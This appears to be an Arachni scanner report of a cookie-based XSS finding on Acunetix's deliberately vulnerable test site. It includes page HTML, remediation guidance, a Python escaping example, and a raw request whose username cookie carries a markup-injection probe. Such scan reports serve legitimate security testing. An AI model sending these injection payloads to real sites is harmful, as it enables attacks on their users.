for host <b class="ng-binding"></b></div> </div> </div> <!-- ngRepeat: item in items | filter:filter | filter:searchText --><div ng-repeat="item in items | filter:filter | filter:searchText" id="itemList" class="ng-scope"> <div class="well well-small shadow" style="overflow: hidden;"> <div class="span7"><a ng-href="https://twitter.com/bradhoylman/status/991408461203279872" target="_blank" href="https://twitter.com/bradhoylman/status/991408461203279872" data-arachni-id="-1241260543"><img ng-src="/static/scr/default.png" class="img-rounded" src="/static/scr/default.png"></a></div> <div class="span5 well well-small detailsbox"> <div class="row-fluid"> <div class="rating"> </div> </div> <div class="row-fluid"> <div class="muted pull-left" style="padding-bottom: 10px;"><a ng-href="#/all/filter/twitter.com" class="ng-binding" href="#/all/filter/twitter.com" data-arachni-id="-1830313082">twitter.com</a></div> <div class="muted pull-right" style="padding-bottom: 10px;"> <a class="btn btn-mini" ng-href="/like?id=696a3680438a7af53a0a54d3d26469bf" href="/like?id=696a3680438a7af53a0a54d3d26469bf" data-arachni-id="-466859719"><i class="icon-thumbs-up" title="Like"></i></a> <a class="btn btn-mini" ng-href="/comment?id=696a3680438a7af53a0a54d3d26469bf" href="/comment?id=696a3680438a7af53a0a54d3d26469bf" data-arachni-id="611572569"><i class="icon-comment" title="Comment"></i></a> <a class="btn btn-mini" ng-href="/report?id=696a3680438a7af53a0a54d3d26469bf" href="/report?id=696a3680438a7af53a0a54d3d26469bf" data-arachni-id="2002938079"><i class="icon-warning-sign" title="Report"></i></a> </div> </div> <a ng-href="#/redir?url=https://twitter.com/bradhoylman/status/991408461203279872" href="#/redir?url=https://twitter.com/bradhoylman/status/991408461203279872"><div class="detailsboxTitle ng-binding">Senator Brad Hoylman</div></a> <hr> <div class="row-fluid" style="margin-top: 15px; margin-bottom: 15px;"> <div class=""><b class="ng-binding">1</b> tweets from <!-- ngRepeat: user in 
item.value.users --><span ng-repeat="user in item.value.users" class="ng-scope"> <a ng-href="http://twitter.com/EFF" target="_blank" class="ng-binding" href="http://twitter.com/EFF" data-arachni-id="1975173">@EFF</a> </span> </div> </div> <div class="ng-binding"> <a ng-href="http://twitter.com/EFF" target="_blank" href="http://twitter.com/EFF" data-arachni-id="-1973652892"><b class="ng-binding">@EFF</b></a><br> We're glad to see New York introducing #NetNeutrality protections based on California's SB 822 <br><br> </div> </div> </div> </div><div ng-repeat="item in items | filter:filter | filter:searchText" id="itemList" class="ng-scope"> <div class="well well-small shadow" style="overflow: hidden;"> <div class="span7"><a ng-href="https://www.eff.org/deeplinks/2018/05/there-no-middle-ground-encryption" target="_blank" href="https://www.eff.org/deeplinks/2018/05/there-no-middle-ground-encryption" data-arachni-id="-1241260543"><img ng-src="/static/scr/default.png" class="img-rounded" src="/static/scr/default.png"></a></div> <div class="span5 well well-small detailsbox"> <div class="row-fluid"> <div class="rating"> </div> </div> <div class="row-fluid"> <div class="muted pull-left" style="padding-bottom: 10px;"><a ng-href="#/all/filter/www.eff.org" class="ng-binding" href="#/all/filter/www.eff.org" data-arachni-id="-313525244">www.eff.org</a></div> <div class="muted pull-right" style="padding-bottom: 10px;"> <a class="btn btn-mini" ng-href="/like?id=6cc95ec82a3e1524115d692b9386d60a" href="/like?id=6cc95ec82a3e1524115d692b9386d60a" data-arachni-id="-466859719"><i class="icon-thumbs-up" title="Like"></i></a> <a class="btn btn-mini" ng-href="/comment?id=6cc95ec82a3e1524115d692b9386d60a" href="/comment?id=6cc95ec82a3e1524115d692b9386d60a" data-arachni-id="611572569"><i class="icon-comment" title="Comment"></i></a> <a class="btn btn-mini" ng-href="/report?id=6cc95ec82a3e1524115d692b9386d60a" href="/report?id=6cc95ec82a3e1524115d692b9386d60a" data-arachni-id="2002938079"><i 
class="icon-warning-sign" title="Report"></i></a> </div> </div> <a ng-href="#/redir?url=https://www.eff.org/deeplinks/2018/05/there-no-middle-ground-encryption" href="#/redir?url=https://www.eff.org/deeplinks/2018/05/there-no-middle-ground-encryption"><div class="detailsboxTitle ng-binding">There is No Middle Ground on Encryption</div></a> <hr> <div class="row-fluid" style="margin-top: 15px; margin-bottom: 15px;"> <div class=""><b class="ng-binding">1</b> tweets from <!-- ngRepeat: user in item.value.users --><span ng-repeat="user in item.value.users" class="ng-scope"> <a ng-href="http://twitter.com/EFF" target="_blank" class="ng-binding" href="http://twitter.com/EFF" data-arachni-id="1975173">@EFF</a> </span> </div> </div> <div class="ng-binding"> <a ng-href="http://twitter.com/EFF" target="_blank" href="http://twitter.com/EFF" data-arachni-id="-1973652892"><b class="ng-binding">@EFF</b></a><br> The “middle ground” between what law enforcement agencies want—bad encryption—and what users want—good encryption—is still just bad encryption <br><br> </div> </div> </div> </div><div ng-repeat="item in items | filter:filter | filter:searchText" id="itemList" class="ng-scope"> <div class="well well-small shadow" style="overflow: hidden;"> <div class="span7"><a ng-href="https://ssd.eff.org/en/module-categories/security-scenarios" target="_blank" href="https://ssd.eff.org/en/module-categories/security-scenarios" data-arachni-id="-1241260543"><img ng-src="/static/scr/default.png" class="img-rounded" src="/static/scr/default.png"></a></div> <div class="span5 well well-small detailsbox"> <div class="row-fluid"> <div class="rating"> </div> </div> <div class="row-fluid"> <div class="muted pull-left" style="padding-bottom: 10px;"><a ng-href="#/all/filter/ssd.eff.org" class="ng-binding" href="#/all/filter/ssd.eff.org" data-arachni-id="-947703951">ssd.eff.org</a></div> <div class="muted pull-right" style="padding-bottom: 10px;"> <a class="btn btn-mini" 
ng-href="/like?id=89c6a73900cd1e30f3ee69a3c7d8b9b6" href="/like?id=89c6a73900cd1e30f3ee69a3c7d8b9b6" data-arachni-id="-466859719"><i class="icon-thumbs-up" title="Like"></i></a> <a class="btn btn-mini" ng-href="/comment?id=89c6a73900cd1e30f3ee69a3c7d8b9b6" href="/comment?id=89c6a73900cd1e30f3ee69a3c7d8b9b6" data-arachni-id="611572569"><i class="icon-comment" title="Comment"></i></a> <a class="btn btn-mini" ng-href="/report?id=89c6a73900cd1e30f3ee69a3c7d8b9b6" href="/report?id=89c6a73900cd1e30f3ee69a3c7d8b9b6" data-arachni-id="2002938079"><i class="icon-warning-sign" title="Report"></i></a> </div> </div> <a ng-href="#/redir?url=https://ssd.eff.org/en/module-categories/security-scenarios" href="#/redir?url=https://ssd.eff.org/en/module-categories/security-scenarios"><div class="detailsboxTitle ng-binding">Security Scenarios</div></a> <hr> <div class="row-fluid" style="margin-top: 15px; margin-bottom: 15px;"> <div class=""><b class="ng-binding">1</b> tweets from <!-- ngRepeat: user in item.value.users --><span ng-repeat="user in item.value.users" class="ng-scope"> <a ng-href="http://twitter.com/EFF" target="_blank" class="ng-binding" href="http://twitter.com/EFF" data-arachni-id="1975173">@EFF</a> </span> </div> </div> <div class="ng-binding"> <a ng-href="http://twitter.com/EFF" target="_blank" href="http://twitter.com/EFF" data-arachni-id="-1973652892"><b class="ng-binding">@EFF</b></a><br> Our Surveillance Self-Defense site has lessons for targeted groups like journalists and journalism students to be safer online without sacrificing access to information. 
<br><br> </div> </div> </div> </div><div ng-repeat="item in items | filter:filter | filter:searchText" id="itemList" class="ng-scope"> <div class="well well-small shadow" style="overflow: hidden;"> <div class="span7"><a ng-href="https://blog.github.com/2018-05-01-github-pages-custom-domains-https/" target="_blank" href="https://blog.github.com/2018-05-01-github-pages-custom-domains-https/" data-arachni-id="-1241260543"><img ng-src="/static/scr/default.png" class="img-rounded" src="/static/scr/default.png"></a></div> <div class="span5 well well-small detailsbox"> <div class="row-fluid"> <div class="rating"> </div> </div> <div class="row-fluid"> <div class="muted pull-left" style="padding-bottom: 10px;"><a ng-href="#/all/filter/blog.github.com" class="ng-binding" href="#/all/filter/blog.github.com" data-arachni-id="1782715074">blog.github.com</a></div> <div class="muted pull-right" style="padding-bottom: 10px;"> <a class="btn btn-mini" ng-href="/like?id=e2fcb75b30bd0791a1fd5bc13ca66343" href="/like?id=e2fcb75b30bd0791a1fd5bc13ca66343" data-arachni-id="-466859719"><i class="icon-thumbs-up" title="Like"></i></a> <a class="btn btn-mini" ng-href="/comment?id=e2fcb75b30bd0791a1fd5bc13ca66343" href="/comment?id=e2fcb75b30bd0791a1fd5bc13ca66343" data-arachni-id="611572569"><i class="icon-comment" title="Comment"></i></a> <a class="btn btn-mini" ng-href="/report?id=e2fcb75b30bd0791a1fd5bc13ca66343" href="/report?id=e2fcb75b30bd0791a1fd5bc13ca66343" data-arachni-id="2002938079"><i class="icon-warning-sign" title="Report"></i></a> </div> </div> <a ng-href="#/redir?url=https://blog.github.com/2018-05-01-github-pages-custom-domains-https/" href="#/redir?url=https://blog.github.com/2018-05-01-github-pages-custom-domains-https/"><div class="detailsboxTitle ng-binding">Custom domains on GitHub Pages gain support for HTTPS</div></a> <hr> <div class="row-fluid" style="margin-top: 15px; margin-bottom: 15px;"> <div class=""><b class="ng-binding">1</b> tweets from <!-- ngRepeat: user in 
item.value.users --><span ng-repeat="user in item.value.users" class="ng-scope"> <a ng-href="http://twitter.com/github" target="_blank" class="ng-binding" href="http://twitter.com/github" data-arachni-id="-279974877">@github</a> </span> </div> </div> <div class="ng-binding"> <a ng-href="http://twitter.com/github" target="_blank" href="http://twitter.com/github" data-arachni-id="750470370"><b class="ng-binding">@github</b></a><br> Today, custom domains on GitHub Pages are gaining support for HTTPS via @letsencrypt. It's another step towards making the web more secure for everyone. <br><br> </div> </div> </div> </div> <ul class="pager ng-scope"> <li><a ng-href="#/popular/page/-1" ng-show="page>0" href="#/popular/page/-1" style="display: none;">Previous</a></li> <li><a ng-href="#/popular/page/1" ng-show="filter==''" href="#/popular/page/1" data-arachni-id="2424595">Next</a></li> </ul></div></div> </div><!--/row--> </div><!--/span--> </div><!--/row--> <hr> <div class="row-fluid"> <div class="pull-left" style="font-size: xx-small;" id="refId">unknown is coming from <b>unknown</b> and has visited this page <b>1</b> times.</div> </div> <div style="background-color:lightgray;width:100%;text-align:center;font-size:14px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p> </div> <footer> <p class="pull-left">© Acunetix Ltd. 
2019</p> </footer> </div><!--/.fluid-container--> <!-- Modal --> <div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true"> <form class="modal-body ng-pristine ng-valid" action="/login" method="POST" id="loginForm"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> <h3 id="myModalLabel">Login</h3> </div> <div class="modal-body"> <div class="control-group"> <!-- Username --> <label class="control-label" for="username">Username</label> <div class="controls"> <input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin"> </div> </div> <div class="control-group"> <!-- Password--> <label class="control-label" for="password">Password</label> <div class="controls"> <input type="password" id="password" name="password" placeholder="" class="input-xlarge"> </div> </div> <div class="control-group"> <a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a> </div> </div> <div class="modal-footer"> <button class="btn btn-primary" id="loginFormSubmit">Login</button> <button class="btn" data-dismiss="modal" aria-hidden="true">Close</button> </div> </form> </div> <!-- Le javascript ================================================== --> <!-- Placed at the end of the document so the pages load faster --> <script src="http://code.jquery.com/jquery-1.9.1.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); 
_arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <!-- App libs --> <script src="/static/app/app.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/libs/sessvars.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/post.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script><div class="fb-comments" data-num-posts="4" data-width="470" data-href="http://testhtml5.vulnweb.com/"></div> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script 
src="/static/app/controllers/controllers.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/services/itemsService.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://bxss.s3.amazonaws.com/ad.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script><iframe name="ads_ads_frame" src="http://ads.bxss.me/ad_server.php?zone_id=234&ad_client=723898932&u_h=1080&u_w=1920&pn=&ref=&url=http://testhtml5.vulnweb.com/&" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" frameborder="0" height="1" scrolling="no" width="1" style="background-color:#FFFFFF;"></iframe> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> </body></html> |
This is the original HTTP response body.
<script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <!DOCTYPE html> <html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp"> <head> <meta charset="utf-8"> <title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content=""> <meta name="author" content=""> <!-- Le styles --> <link 
href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet"> <link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'> <link href="/static/css/style.css" rel="stylesheet"> <link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico"> <style type="text/css"> body { padding-top: 60px; padding-bottom: 40px; } .sidebar-nav { padding: 9px 0; } @media (max-width: 980px) { /* Enable use of floated navbar text */ .navbar-text.pull-right { float: none; padding-left: 5px; padding-right: 5px; } } </style> </head> <body> <div class="navbar navbar-fixed-top"> <div class="navbar-inner"> <div class="container-fluid"> <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security"> </a> <p class="navbar-text pull-left"> Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>. 
</p> <p class="navbar-text pull-right"> <a href="#myModal" role="button" class="btn" data-toggle="modal">Login</a> </p> </div> </div> </div> <div class="container-fluid"> <div class="row-fluid"> <div class="span2"> <div class="well sidebar-nav"> <ul class="nav nav-list"> <li class="nav-header">Views</li> <li id="popularLi" class="active"><a href="#/popular">Popular</a></li> <li><a href="#/latest">Latest</a></li> <li><a href="#/carousel">Carousel</a></li> <li><a href="#/archive">Archive</a></li> <li class="nav-header">Website</li> <li><a href="#/about">About</a></li> <li><a href="#/contact">Contact</a></li> <li class="nav-header">Acunetix</li> <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li> <li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li> <li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li> <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li> <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li> <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li> </ul> </div><!--/.well --> </div><!--/span--> <div class="span10"> <div class="row-fluid"> <div ng-view></div> </div><!--/row--> </div><!--/span--> </div><!--/row--> <hr> <div class="row-fluid"> <div class="pull-left" style="font-size: xx-small;" id="refId"></div> </div> <div style="background-color:lightgray;width:100%;text-align:center;font-size:14px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). 
Links presented on this site have no affiliation to the site and are here only as samples.</p> </div> <footer> <p class="pull-left">© Acunetix Ltd. 2019</p> </footer> </div><!--/.fluid-container--> <!-- Modal --> <div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true"> <form class="modal-body" action="/login" method="POST" id="loginForm"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> <h3 id="myModalLabel">Login</h3> </div> <div class="modal-body"> <div class="control-group"> <!-- Username --> <label class="control-label" for="username">Username</label> <div class="controls"> <input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin"> </div> </div> <div class="control-group"> <!-- Password--> <label class="control-label" for="password">Password</label> <div class="controls"> <input type="password" id="password" name="password" placeholder="" class="input-xlarge"> </div> </div> <div class="control-group"> <a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a> </div> </div> <div class="modal-footer"> <button class="btn btn-primary" id="loginFormSubmit">Login</button> <button class="btn" data-dismiss="modal" aria-hidden="true">Close</button> </div> </form> </div> <!-- Le javascript ================================================== --> <!-- Placed at the end of the document so the pages load faster --> <script src="http://code.jquery.com/jquery-1.9.1.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"> // 
Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <!-- App libs --> <script src="/static/app/app.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/libs/sessvars.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/post.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script 
src="/static/app/controllers/controllers.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/services/itemsService.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://bxss.s3.amazonaws.com/ad.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> </body> </html> |
Client-side scripts are used extensively by modern web applications. They perform anything from simple functions (such as the formatting of text) to full manipulation of client-side data and Operating System interaction.
Cross-Site Scripting (XSS) allows a client to inject script into a request and have the server return that script to the client in the response. This occurs because the application takes untrusted data (in this example, from the client) and reuses it in its output without performing any validation or sanitisation.
If the injected script is returned immediately, this is known as reflected XSS. If the injected script is stored by the server and returned to any client visiting the affected page, this is known as persistent XSS (also stored XSS).
Arachni has discovered that it is possible to insert script content directly into HTML element content. In this finding the untrusted data is the username cookie: the raw request and response below show its value reflected, unencoded, inside the "Welcome <b>...</b>" text of the navigation bar, where the scanner's payload closes the surrounding context and lands as a new element. Because the vector is a cookie rather than a URL parameter, exploiting it against another user requires some way to set that user's username cookie; the scan output proves the unencoded reflection, not that such a delivery route exists.
To remedy XSS vulnerabilities, never use untrusted or unfiltered data within the code of an HTML page.
Untrusted data can originate not only from the client but also from a third party, a previously uploaded file, and so on.
Filtering of untrusted data typically involves converting special characters to their HTML entity encoded counterparts (other methods do exist; see references). These special characters include:
* &
* <
* >
* "
* '
* /
An example of HTML entity encoding is converting < to &lt;.
Although it is possible to filter untrusted input, there are five locations within an HTML page where untrusted input (even if it has been filtered) should never be placed:
1. Directly in a script.
2. Inside an HTML comment.
3. In an attribute name.
4. In a tag name.
5. Directly in CSS.
Each of these locations has its own form of escaping and filtering.
Because many browsers have attempted to implement built-in XSS protection (Chrome's XSS Auditor, removed in Chrome 78, and the XSS Filter in Internet Explorer and legacy Edge could block a reflected payload from executing), any manual verification of this finding should be conducted using multiple different browsers and browser versions.
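The reflection and the entity-encoding remedy described above, as an added example in Python that is not part of the Arachni report or of the target application's code. The navbar template is a hypothetical stand-in for whatever server-side code produced the "Welcome <b>...</b>" fragment; the scan seed, the cookie payload and the reflected fragment are copied from the raw request and response on this page. seed_became_element mirrors the verification a scanner performs: the finding counts only when an HTML parser turns the seed into an element named xss_<seed>, not when the seed merely survives as text.

```python
from html.parser import HTMLParser

# Scan seed and cookie value, copied from the raw request on this page.
SEED = "0c25785427908905790d3a663dc49fa7"
PAYLOAD = "arachni_name</textarea>--><xss_" + SEED + "/><!--<textarea>"

# Reflected fragment, copied from the raw response on this page.
RESPONSE_FRAGMENT = (
    "Welcome <b>arachni_name</textarea>--><xss_" + SEED + "/><!--<textarea></b>"
    " | <a href='/logout'>Logout</a>"
)

# Hypothetical server-side template for that fragment (assumption: the real
# application's code is not on the page, only its output is).
NAVBAR = "Welcome <b>{name}</b> | <a href='/logout'>Logout</a>"


def render_vulnerable(username: str) -> str:
    """Reflect the cookie value into element content untouched: what the scan observed."""
    return NAVBAR.format(name=username)


# The six characters the remedy text lists, mapped to their entity encodings.
ENTITY_TABLE = {
    "&": "&amp;",
    "<": "&lt;",
    ">": "&gt;",
    '"': "&quot;",
    "'": "&#x27;",
    "/": "&#x2F;",
}


def escape_html(value: str) -> str:
    """Entity-encode untrusted text for the HTML element-content context."""
    # '&' is encoded as well, otherwise an attacker could smuggle entities through.
    return "".join(ENTITY_TABLE.get(ch, ch) for ch in value)


def render_fixed(username: str) -> str:
    """Same template, with the untrusted value encoded before it enters the page."""
    return NAVBAR.format(name=escape_html(username))


class _TagCollector(HTMLParser):
    """Record every element name the parser creates while reading a document."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)

    def handle_startendtag(self, tag, attrs):
        # Self-closing form, e.g. <xss_.../>, as used by the scanner payload.
        self.tags.append(tag)


def seed_became_element(body: str, seed: str) -> bool:
    """Scanner-style verification: True only if the parser produced an element
    named xss_<seed>. A seed present only as text, or as &lt;xss_...&gt;, is not
    a reflection into markup and does not confirm the finding."""
    collector = _TagCollector()
    collector.feed(body)
    collector.close()
    return ("xss_" + seed) in collector.tags


if __name__ == "__main__":
    print("scanner response fragment:", seed_became_element(RESPONSE_FRAGMENT, SEED))
    print("vulnerable render:", seed_became_element(render_vulnerable(PAYLOAD), SEED))
    print("fixed render:", seed_became_element(render_fixed(PAYLOAD), SEED))
```

In a real application, prefer the framework's autoescaping (or Python's html.escape, which covers & < > " ' but not /) over a hand-written table; the table above exists only to mirror the six characters the text lists. The encoder shown is correct for element content only; a value placed in an attribute, a JavaScript string, a URL or CSS needs the encoder for that context, which is the point of the five locations listed above.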
Cookie input username, using GET at http://testhtml5.vulnweb.com/logout, pointing to http://testhtml5.vulnweb.com/logout.
username=; expires=Thu, 01-Jan-1970 00:00:00 GMT; Path=/
| Type | In | Action | Default inputs | Updated inputs |
|---|---|---|---|---|
| cookie | http://testhtml5.vulnweb.com/logout | http://testhtml5.vulnweb.com/logout | | |
Raw HTTP request used to retrieve the page.
GET / HTTP/1.1
Host: testhtml5.vulnweb.com
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: 0c25785427908905790d3a663dc49fa7
Cookie: username=arachni_name</textarea>--><xss_0c25785427908905790d3a663dc49fa7/><!--<textarea>
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 302 FOUND
Server: nginx/1.4.1
Date: Mon, 26 Jan 1970 07:00:01 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 209
Connection: keep-alive
Location: http://testhtml5.vulnweb.com/
Set-Cookie: username=; expires=Thu, 01-Jan-1970 00:00:00 GMT; Path=/
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Mon, 26 Jan 1970 07:00:02 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *
Content-Encoding: gzip
<!DOCTYPE html>
<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">
<head>
<meta charset="utf-8">
<title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="description" content="">
<meta name="author" content="">
<!-- Le styles -->
<link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">
<link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'>
<link href="/static/css/style.css" rel="stylesheet">
<link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico">
<style type="text/css">
body {
padding-top: 60px;
padding-bottom: 40px;
}
.sidebar-nav {
padding: 9px 0;
}
@media (max-width: 980px) {
/* Enable use of floated navbar text */
.navbar-text.pull-right {
float: none;
padding-left: 5px;
padding-right: 5px;
}
}
